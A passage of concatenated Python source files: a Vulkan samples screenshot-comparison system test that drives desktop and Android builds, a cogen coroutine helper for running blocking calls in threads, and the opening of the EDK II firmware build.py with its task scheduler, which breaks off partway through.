You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys, os, math, platform, threading, datetime, subprocess, zipfile, argparse, shutil, struct, imghdr
from time import sleep
from threading import Thread
# Settings (changing these may cause instabilities)
# External command-line tools that must be available on PATH.
dependencies = ("magick", "cmake", "git", "adb")
# When True, subtests are executed on parallel threads (see main()).
multithread = False
# Names of the sub tests to run; populated from the --subtests argument.
sub_tests = []
test_desktop = True
test_android = True
# ImageMagick comparison metric passed to `magick compare -metric`.
comparison_metric = "MAE"
current_dir = os.getcwd()
script_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.join(script_path, "../../")
# Filled in from the --build / --config command-line arguments.
build_path = ""
build_config = ""
# Where the sample applications write their screenshots.
outputs_path = os.path.join(root_path, "output/images/")
# Scratch directory for per-platform screenshots; archived on failure.
tmp_path = os.path.join(script_path, "tmp/")
archive_path = os.path.join(script_path, "artifacts/")
image_ext = ".png"
android_timeout = 60 # How long in seconds should we wait before timing out on Android
check_step = 5
threshold = 0.999 # How similar the images are allowed to be before they pass
class Subtest:
    """A single sample test: launches the application in headless test mode,
    then compares the screenshot it produced against the gold image.
    """

    # Outcome of the last test() call; stays False until a comparison passes.
    result = False
    test_name = ""
    platform = ""

    def __init__(self, test_name, platform):
        self.test_name = test_name
        self.platform = platform

    def run(self, application_path):
        """Launch the sample binary in hidden test mode.

        @param application_path Path to the binary, relative to the repo root
        @return True if the process was launched, False on launch failure
        """
        result = True
        path = root_path + application_path
        arguments = ["--hide", "--test", "{}".format(self.test_name)]
        try:
            subprocess.run([path] + arguments, cwd=root_path)
        except FileNotFoundError:
            print("\t\t\t(Error) Couldn't find application ({})".format(path))
            result = False
        # Fix: was a bare `except:`, which also swallowed KeyboardInterrupt /
        # SystemExit and made a stuck run impossible to interrupt cleanly.
        except Exception:
            print("\t\t\t(Error) Application error ({})".format(path))
            result = False
        return result

    def test(self):
        """Move the screenshot produced by run() into the per-platform tmp
        directory and compare it against the gold image, recording the
        outcome in self.result."""
        print("\t\t=== Test started: {} ===".format(self.test_name))
        self.result = True
        screenshot_path = tmp_path + self.platform + "/"
        try:
            shutil.move(outputs_path + self.test_name + image_ext, screenshot_path + self.test_name + image_ext)
        except FileNotFoundError:
            # No screenshot usually means the application crashed before
            # writing its output image.
            print("\t\t\t(Error) Couldn't find screenshot ({}), perhaps test crashed".format(outputs_path + self.test_name + image_ext))
            self.result = False
            return
        if not test(self.test_name, screenshot_path):
            self.result = False
        if self.result:
            print("\t\t=== Passed! ===")
        else:
            print("\t\t=== Failed. ===")

    def passed(self):
        """@return True if the last test() comparison succeeded."""
        return self.result
class WindowsSubtest(Subtest):
    """Subtest specialization that launches the Windows (.exe) build."""

    def __init__(self, test_name):
        super().__init__(test_name, "Windows")

    def run(self):
        # CMake output layout: <build>/app/bin/<config>/<arch>/vulkan_samples.exe
        exe_path = "{}app/bin/{}/{}/vulkan_samples.exe".format(
            build_path, build_config, platform.machine())
        return super().run(exe_path)
class UnixSubtest(Subtest):
    """Subtest specialization for Linux/macOS binaries (no .exe suffix)."""

    def __init__(self, test_name, platform_type):
        super().__init__(test_name, platform_type)

    def run(self):
        # CMake output layout: <build>/app/bin/<config>/<arch>/vulkan_samples
        binary_path = "{}app/bin/{}/{}/vulkan_samples".format(
            build_path, build_config, platform.machine())
        return super().run(binary_path)
class AndroidSubtest(Subtest):
    """Subtest specialization that drives the sample on an attached Android
    device via adb, polling the focused window to detect completion."""
    def __init__(self, test_name):
        super().__init__(test_name, "Android")
    def run(self):
        # Ensure a clean start: kill any previous instance of the sample app.
        subprocess.run("adb shell am force-stop com.khronos.vulkan_samples")
        # Launch the sample activity with the test name passed as an extra.
        subprocess.run(["adb", "shell", "am", "start", "-W", "-n", "com.khronos.vulkan_samples/com.khronos.vulkan_samples.BPSampleActivity", "-e", "test", "{0}".format(self.test_name)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        # Extract the focused activity name from dumpsys output.
        # NOTE(review): unlike the polling call below, this pipeline is not
        # wrapped in quotes for the device shell — confirm the grep/cut run
        # on the device rather than the host.
        output = subprocess.check_output("adb shell dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1")
        activity = "".join(output.decode("utf-8").split())
        timeout_counter = 0
        # Poll every check_step seconds while the sample is still focused,
        # up to android_timeout seconds in total.
        while activity == "vulkan_samples" and timeout_counter <= android_timeout:
            sleep(check_step)
            timeout_counter += check_step
            output = subprocess.check_output("adb shell \"dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1\"")
            activity = "".join(output.decode("utf-8").split())
        if timeout_counter <= android_timeout:
            # The app exited in time: pull its screenshot from device storage
            # into the host's output directory for comparison.
            subprocess.run(["adb", "pull", "/sdcard/Android/data/com.khronos.vulkan_samples/files/" + outputs_path + self.test_name + image_ext, root_path + outputs_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            return True
        else:
            print("\t\t\t(Error) Timed out")
            return False
def create_app(platform, test_name):
    """
    @brief Creates the Subtest subclass appropriate for the given platform
    @param platform Name of the target platform ("Windows", "Linux", "Darwin" or "Android")
    @param test_name The name of the test the subtest will run
    @return A runnable Subtest instance
    """
    if platform == "Android":
        return AndroidSubtest(test_name)
    if platform == "Windows":
        return WindowsSubtest(test_name)
    if platform in ("Linux", "Darwin"):
        return UnixSubtest(test_name, platform)
    # Unknown platform: nothing sensible to build, abort the whole run.
    print("Error: cannot create subtest, cant find associated platform.")
    exit(1)
def get_command(command):
    """
    @brief Ensures a command name is executable on the current platform
    @param command The command's base name
    @return The command with ".exe" appended on Windows, unchanged elsewhere
    """
    suffix = ".exe" if platform.system() == "Windows" else ""
    return command + suffix
def get_resolution(image):
    """
    @brief Gets the width and height of a given image
    @param image The path to the image relative to this script
    @return A string denoting the resolution in the format (WxH)
    """
    # `magick identify -format "%[fx:w]x%[fx:h]"` prints the quoted WxH
    # string; [1:-1] strips the surrounding quote characters.
    return subprocess.check_output([get_command("magick"), "identify", "-format", "\"%[fx:w]x%[fx:h]\"", image]).decode("utf-8")[1:-1]
def compare(metric, base_image, test_image, diff_image = "null:"):
    """
    @brief Compares two images by their mean absolute error (changing the order of these parameters will change the contents of diff_image)
    @param metric The type of image comparison you want to invoke
    @param base_image The relative path to the image to base the test on
    @param test_image The relative path to compare the base_image with
    @param diff_image The relative path to the output image of the difference between the two images, default "null:"
    @return A float clamped between 0 and 1 denoting how similar the images are (1 being identical, 0 being opposite)
    """
    output = ""
    try:
        output = subprocess.check_output([get_command("magick"), "compare", "-metric", metric, base_image, test_image, diff_image], stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        # `magick compare` exits non-zero when the images differ, so the
        # metric text must be recovered from the exception's output.
        output = e.output
        pass
    output = output.decode("utf-8")
    # The normalized error appears in parentheses, e.g. "1234 (0.0188)";
    # similarity = 1 - error, clamped to [0, 1].
    return max(0.0, min(1.0 - float(output[output.find("(")+1:output.find(")")]), 1.0))
def test(test_name, screenshot_path):
    """
    @brief Tests each screenshot within the tmp/ folder against the goldtest, saving the results if it fails
    @param test_name The name of the test, used to retrieve the respective goldtest image
    @param screenshot_path The directory where to store screenshots
    @return True if the image tests pass
    """
    # Run test
    result = False
    image = test_name + image_ext
    base_image = screenshot_path + image
    # Gold images are stored per resolution: assets/gold/<test>/<WxH>.png
    test_image = root_path + "assets/gold/{0}/{1}.png".format(test_name, get_resolution(base_image))
    if not os.path.isfile(test_image):
        print("\t\t\t(Error) Resolution not supported, gold image not found ({})".format(test_image))
        return False
    # The diff image is kept next to the screenshot for failure triage.
    diff_image = "{0}{1}-diff.png".format(screenshot_path, image[0:image.find(".")])
    print("\t\t\t(Comparing images...) '{0}' with '{1}':".format(base_image, test_image), end = " ", flush = True)
    similarity = compare(comparison_metric, base_image, test_image, diff_image)
    # Truncate to 4 decimal places for display.
    print("{}%".format(100*math.floor(similarity*10000)/10000))
    # Remove images if it is identical
    if similarity >= threshold:
        os.remove(base_image)
        os.remove(diff_image)
        result = True
    return result
def execute(app):
    """Run a single subtest; compare its output only if the launch succeeded."""
    print("\t=== Running {} on {} ===".format(app.test_name, app.platform))
    launched = app.run()
    if launched:
        app.test()
def main():
    """
    @brief Runs the system test
    """
    # Create per-platform scratch directories for screenshots.
    if test_android and not os.path.exists(tmp_path + "Android/"):
        os.makedirs(tmp_path + "Android/")
    if test_desktop and not os.path.exists(tmp_path + platform.system()):
        os.makedirs(tmp_path + platform.system())
    print("=== System Test started! ===")
    results = []
    # Create tests
    apps = []
    for test_name in sub_tests:
        if test_android:
            apps.append(create_app("Android", test_name))
        if test_desktop:
            apps.append(create_app(platform.system(), test_name))
    # Run tests
    if not multithread:
        # Sequential mode: run each subtest one after another.
        for app in apps:
            if app:
                execute(app)
    else:
        # Parallel mode: one thread per subtest, then wait for all.
        threads = []
        for app in apps:
            process = Thread(target=execute, args=[app])
            process.start()
            threads.append(process)
        for thread in threads:
            thread.join()
    # Evaluate system test
    passed = 0
    failed = 0
    for app in apps:
        results.append(app.passed())
    for result in results:
        if result:
            passed += 1
        else:
            failed += 1
    if failed == 0:
        # All green: clean up the scratch directory and exit successfully.
        print("=== Success: All tests passed! ===")
        shutil.rmtree(tmp_path)
        exit(0)
    else:
        print("=== Failed: {} passed - {} failed ===".format(passed, failed))
        # If the screenshot directory is not empty, create an archive of the results
        if os.listdir(tmp_path) is not None:
            print("=== Archiving results into '{}' ===".format(shutil.make_archive(archive_path + "system_test" + "-" + datetime.datetime.now().strftime("%Y.%m.%d-%H.%M.%S"), 'zip', tmp_path)))
            shutil.rmtree(tmp_path)
        exit(1)
if __name__ == "__main__":
    argparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A simple script that runs, screenshots, and tests your apps against a pre-existing gold")
    argparser.add_argument("-B", "--build", required=True, help="relative path to the cmake build directory")
    argparser.add_argument("-C", "--config", required=True, help="build configuration to use")
    argparser.add_argument("-S", "--subtests", default=os.listdir(os.path.join(script_path, "sub_tests")), nargs="+", help="if set the specified sub tests will be run instead")
    argparser.add_argument("-P", "--parallel", action='store_true', help="flag to deploy tests in parallel")
    build_group = argparser.add_mutually_exclusive_group()
    build_group.add_argument("-D", "--desktop", action='store_false', help="flag to only deploy tests on desktop")
    build_group.add_argument("-A", "--android", action='store_false', help="flag to only deploy tests on android")
    args = vars(argparser.parse_args())
    build_path = args["build"]
    build_config = args["config"]
    sub_tests = args["subtests"]
    # NOTE: the cross-mapping below is intentional: passing -D/--desktop
    # stores False into args["desktop"], which must disable the *android*
    # run (and vice versa), leaving only the requested platform enabled.
    test_desktop = args["android"]
    test_android = args["desktop"]
    multithread = args["parallel"]
    if build_path[-1] != "/":
        build_path += "/"
    # Ensure right dependencies are installed before continuing
    runnable = True
    for dependency in dependencies:
        if shutil.which(dependency) is None:
            print("Error: Couldn't find {}, perhaps it is not installed".format(dependency))
            runnable = False
    if not runnable:
        if platform.system() not in ["Linux", "Darwin"]:
            exit(1)
        else:
            print("Unix based system detected. Allowing script to continue to account for aliasing. Please ensure you have the dependencies installed or aliased otherwise the script will fail.")
    # If building for android check that a valid device is plugged in
    if test_android:
        try:
            # Pass the command as an argument list: a single "adb get-state"
            # string without shell=True is only runnable on Windows; on
            # Linux/macOS it always raised FileNotFoundError, which the old
            # bare except swallowed, silently disabling Android testing.
            subprocess.check_output(["adb", "get-state"])
        except (OSError, subprocess.CalledProcessError):
            # narrow except: no longer swallows KeyboardInterrupt/SystemExit
            print("Device not found, disabling Android testing")
            test_android = False
        else:
            print("Device found!")
            if multithread:
                print("Android doesn't support multithreading, disabling!")
                multithread = False
    # Run script and handle keyboard interruption
    try:
        main()
    except KeyboardInterrupt:
        print("System Test Aborted")
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
|
inthread.py | from cogen.core import schedulers
from cogen.core.coroutines import coroutine
from cogen.core.events import Operation
from threading import Thread
class RunInThread(Operation):
    """Cogen operation that runs a blocking callable in a daemon thread.

    The coroutine that yields this operation is suspended until the worker
    thread finishes; the callable's return value is delivered back as the
    result of the yield.
    """
    def __init__(self, callable, args=(), kwargs=None):
        self.callable = callable
        self.args = args
        self.kwargs = kwargs if kwargs else {}
        super(RunInThread, self).__init__()

    def _run_thread(self):
        # Runs in the worker thread: execute the payload, then hand the
        # (operation, coroutine) pair back to the scheduler's active queue
        # so the coroutine resumes with self.result.
        self.result = self.callable(*self.args, **self.kwargs)
        self.sched.active.append((self, self.coro))

    def process(self, sched, coro):
        super(RunInThread, self).process(sched, coro)
        self.coro = coro
        self.sched = sched
        worker = Thread(target=self._run_thread)
        self.thread = worker
        # daemon thread: don't keep the interpreter alive if the scheduler exits
        worker.daemon = True
        worker.start()

    def finalize(self, sched):
        super(RunInThread, self).finalize(sched)
        return self.result
if __name__ == "__main__":
    # Demo (Python 2 syntax: print statements, xrange): offload a blocking
    # computation to a worker thread ten times without blocking the scheduler.
    @coroutine
    def test():
        # Blocking payload executed inside the worker thread.
        def computation(a,b,c):
            from time import sleep
            print a, b, c
            sleep(1)
            return a + b + c
        for i in xrange(10):
            print '>', i
            # Suspend this coroutine until the thread completes; the thread's
            # return value is delivered as the result of the yield.
            val = yield RunInThread(computation, args=(i+1,i+2,i+3))
            print val
    # The scheduler stops when no coroutine is runnable; park one coroutine
    # on a listening socket so the loop stays alive for the whole demo.
    @coroutine
    def some_stuff_to_keep_sched_alive():
        from cogen.core.sockets import Socket
        s = Socket()
        s.bind(('localhost', 8000))
        s.listen(1)
        yield s.accept()
    s = schedulers.Scheduler()
    s.add(test)
    s.add(some_stuff_to_keep_sched_alive)
    s.run()
|
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import multiprocessing
from struct import *
from threading import *
import threading
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.TargetTxtClassObject import TargetTxtClassObject
from Common.ToolDefClassObject import ToolDefClassObject
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
# NOTE(review): matches names of the form _<digits>_<digits>_<hex>, which
# look like auto-generated temporary database table names -- confirm against
# the Workspace database code before relying on this.
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
# cache keyed by temporary table name (populated elsewhere in this module)
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
    """Return True if *tool* is found in any directory listed in PATH.

    On Windows every extension from PATHEXT is tried; on other systems only
    the bare tool name is checked.
    """
    if 'PATHEXT' in os.environ:
        extns = os.environ['PATHEXT'].split(os.path.pathsep)
    else:
        # no PATHEXT (non-Windows): probe the unmodified tool name only
        extns = ('',)
    return any(os.path.exists(os.path.join(pathDir, tool + ext))
               for pathDir in os.environ['PATH'].split(os.path.pathsep)
               for ext in extns)
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
    """Verify the environment variables required for a build.

    WORKSPACE, EDK_TOOLS_PATH and PATH must be set; WORKSPACE (and each
    entry of the optional PACKAGES_PATH) must exist and contain no spaces.
    Normalized values are written back to os.environ and GlobalData.
    All failures are reported through EdkLogger.error.
    """
    # check WORKSPACE
    if "WORKSPACE" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="WORKSPACE")
    WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
    if not os.path.exists(WorkspaceDir):
        EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
    elif ' ' in WorkspaceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
                        ExtraData=WorkspaceDir)
    os.environ["WORKSPACE"] = WorkspaceDir
    # set multiple workspace
    PackagesPath = os.getenv("PACKAGES_PATH")
    mws.setWs(WorkspaceDir, PackagesPath)
    if mws.PACKAGES_PATH:
        for Path in mws.PACKAGES_PATH:
            if not os.path.exists(Path):
                EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
            elif ' ' in Path:
                EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
    # check EDK_TOOLS_PATH *before* dereferencing it below; the previous code
    # normalized os.environ["EDK_TOOLS_PATH"] first, which raised a raw
    # KeyError instead of the friendly build error when the variable is unset
    if "EDK_TOOLS_PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="EDK_TOOLS_PATH")
    os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
    # check PATH
    if "PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="PATH")
    GlobalData.gWorkspace = WorkspaceDir
    GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
    GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
    """Normalize *FilePath* and return it relative to *Workspace*.

    A relative FilePath is resolved against the (multiple) workspace; the
    file must exist, otherwise a FILE_NOT_FOUND build error is raised.
    """
    # resolve the path; a relative one is looked up through the workspace
    if os.path.isabs(FilePath):
        FileFullPath = os.path.normpath(FilePath)
    else:
        FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
        Workspace = mws.getWs(Workspace, FilePath)
    # the file must exist
    if not os.path.isfile(FileFullPath):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
    # strip the workspace prefix (plus the separator when the workspace
    # path does not already end with one)
    Prefix = len(Workspace) if Workspace[-1] in ("\\", "/") else len(Workspace) + 1
    return FileFullPath[Prefix:]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
    """Forward each line of the stream *From* to the callable *To*.

    Lines are stripped and decoded as UTF-8 (undecodable bytes ignored).
    The pump stops at end-of-stream (empty read) or, after delivering a
    line, when *ExitFlag* reports isSet() True.
    """
    while True:
        Line = From.readline()
        # an empty read means the stream has ended
        if Line is None or Line == b"":
            break
        To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
        if ExitFlag.isSet():
            break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
    """Run *Command* in *WorkingDir*, mirroring its output through EdkLogger.

    stdout lines are sent to EdkLogger.info and stderr lines to
    EdkLogger.quiet via two ReadMessage redirector threads.  Reports a
    COMMAND_FAILURE build error (through EdkLogger.error) when the command
    cannot be started or exits non-zero.  Returns the elapsed wall-clock
    time as a string such as "1234ms".
    """
    BeginTime = time.time()
    # if working directory doesn't exist, Popen() will raise an exception
    if not os.path.isdir(WorkingDir):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
    # Command is used as the first Argument in following Popen().
    # It could be a string or sequence. We find that if command is a string in following Popen(),
    # ubuntu may fail with an error message that the command is not found.
    # So here we may need convert command from string to list instance.
    if platform.system() != 'Windows':
        if not isinstance(Command, list):
            Command = Command.split()
        Command = ' '.join(Command)
    Proc = None
    EndOfProcedure = None
    try:
        # launch the command
        Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
        # launch two threads to read the STDOUT and STDERR
        EndOfProcedure = Event()
        EndOfProcedure.clear()
        if Proc.stdout:
            StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
            StdOutThread.setName("STDOUT-Redirector")
            StdOutThread.setDaemon(False)
            StdOutThread.start()
        if Proc.stderr:
            StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
            StdErrThread.setName("STDERR-Redirector")
            StdErrThread.setDaemon(False)
            StdErrThread.start()
        # waiting for program exit
        Proc.wait()
    except: # in case of aborting
        # terminate the threads redirecting the program output
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        if EndOfProcedure is not None:
            EndOfProcedure.set()
        if Proc is None:
            # Popen itself failed (e.g. command not found): report and abort
            if not isinstance(Command, type("")):
                Command = " ".join(Command)
            EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
    # NOTE(review): the code below assumes EdkLogger.error above raised when
    # Proc is None; otherwise the attribute accesses would fail -- confirm
    # EdkLogger.error's raising behavior before changing this flow.
    if Proc.stdout:
        StdOutThread.join()
    if Proc.stderr:
        StdErrThread.join()
    # check the return code of the program
    if Proc.returncode != 0:
        if not isinstance(Command, type("")):
            Command = " ".join(Command)
        # print out the Response file and its content when make failure
        RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
        if os.path.isfile(RespFile):
            f = open(RespFile)
            RespContent = f.read()
            f.close()
            EdkLogger.info(RespContent)
        EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
    return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
    ## The constructor
    #
    #   @param  self            The object pointer
    #   @param  Obj             The object the build is working on
    #   @param  BuildCommand    The command line used to build the object
    #   @param  Target          The build target name, one of gSupportedTarget
    #   @param  Dependency      The BuildUnit(s) which must be completed in advance
    #   @param  WorkingDir      The directory the build command starts in
    #
    def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
        self.BuildObject = Obj
        self.BuildCommand = BuildCommand
        self.Target = Target
        self.Dependency = Dependency
        self.WorkingDir = WorkingDir
        # a unit without a build command can never be built -- abort early
        if not BuildCommand:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
                            ExtraData=str(Obj))

    ## String representation, delegated to the wrapped build object
    #
    def __str__(self):
        return str(self.BuildObject)

    ## "==" operator: same build object built for the same architecture
    #
    # The chained "and" preserves the historical truthiness semantics: a
    # falsy Other or falsy Other.BuildObject short-circuits the result.
    #
    def __eq__(self, Other):
        return (Other
                and self.BuildObject == Other.BuildObject
                and Other.BuildObject
                and self.BuildObject.Arch == Other.BuildObject.Arch)

    ## hash() combines the build object's hash with its architecture's
    #
    def __hash__(self):
        return hash(self.BuildObject) + hash(self.BuildObject.Arch)

    def __repr__(self):
        return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
    ## The constructor
    #
    # The dependencies are the make units of every library the module links
    # against; a request to build "all" (or no target) is mapped to the
    # module-level "tbuild" make target.
    #
    #   @param  self        The object pointer
    #   @param  Obj         The ModuleAutoGen object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        LibraryUnits = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, LibraryUnits, Obj.MakeFileDir)
        if Target in (None, "", "all"):
            self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
    ## The constructor
    #
    #   @param  self        The object pointer
    #   @param  Obj         The PlatformAutoGen object the build is working on
    #   @param  Target      The build target name, one of gSupportedTarget
    #
    def __init__(self, Obj, Target):
        # Use Obj directly here: self.BuildObject is only assigned by
        # BuildUnit.__init__ below, so referencing self.BuildObject at this
        # point raised AttributeError before the base constructor ran.
        Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
        Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
        BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
    """Thread scheduler for BuildUnit objects.

    All queues and flags are class attributes: there is one global scheduler.
    Tasks move _PendingQueue -> _ReadyQueue (once their dependencies are
    complete) -> _RunningQueue (while their build thread runs); a
    BoundedSemaphore caps the number of concurrent build threads.
    """
    # queue for tasks waiting for schedule
    _PendingQueue = OrderedDict()
    _PendingQueueLock = threading.Lock()
    # queue for tasks ready for running
    _ReadyQueue = OrderedDict()
    _ReadyQueueLock = threading.Lock()
    # queue for run tasks
    _RunningQueue = OrderedDict()
    _RunningQueueLock = threading.Lock()
    # queue containing all build tasks, in case duplicate build
    _TaskQueue = OrderedDict()
    # flag indicating error occurs in a running thread
    _ErrorFlag = threading.Event()
    _ErrorFlag.clear()
    _ErrorMessage = ""
    # BoundedSemaphore object used to control the number of running threads
    _Thread = None
    # flag indicating if the scheduler is started or not
    _SchedulerStopped = threading.Event()
    _SchedulerStopped.set()
    ## Start the task scheduler thread
    #
    # @param MaxThreadNumber The maximum thread number
    # @param ExitFlag Flag used to end the scheduler
    #
    @staticmethod
    def StartScheduler(MaxThreadNumber, ExitFlag):
        SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
        SchedulerThread.setName("Build-Task-Scheduler")
        SchedulerThread.setDaemon(False)
        SchedulerThread.start()
        # wait for the scheduler to be started, especially useful in Linux
        while not BuildTask.IsOnGoing():
            time.sleep(0.01)
    ## Scheduler method
    #
    # @param MaxThreadNumber The maximum thread number
    # @param ExitFlag Flag used to end the scheduler
    #
    @staticmethod
    def Scheduler(MaxThreadNumber, ExitFlag):
        BuildTask._SchedulerStopped.clear()
        try:
            # use BoundedSemaphore to control the maximum running threads
            BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
            #
            # scheduling loop, which will exits when no pending/ready task and
            # indicated to do so, or there's error in running thread
            #
            while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
                   or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
                EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
                                % (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
                # get all pending tasks
                BuildTask._PendingQueueLock.acquire()
                BuildObjectList = list(BuildTask._PendingQueue.keys())
                #
                # check if their dependency is resolved, and if true, move them
                # into ready queue
                #
                for BuildObject in BuildObjectList:
                    Bt = BuildTask._PendingQueue[BuildObject]
                    if Bt.IsReady():
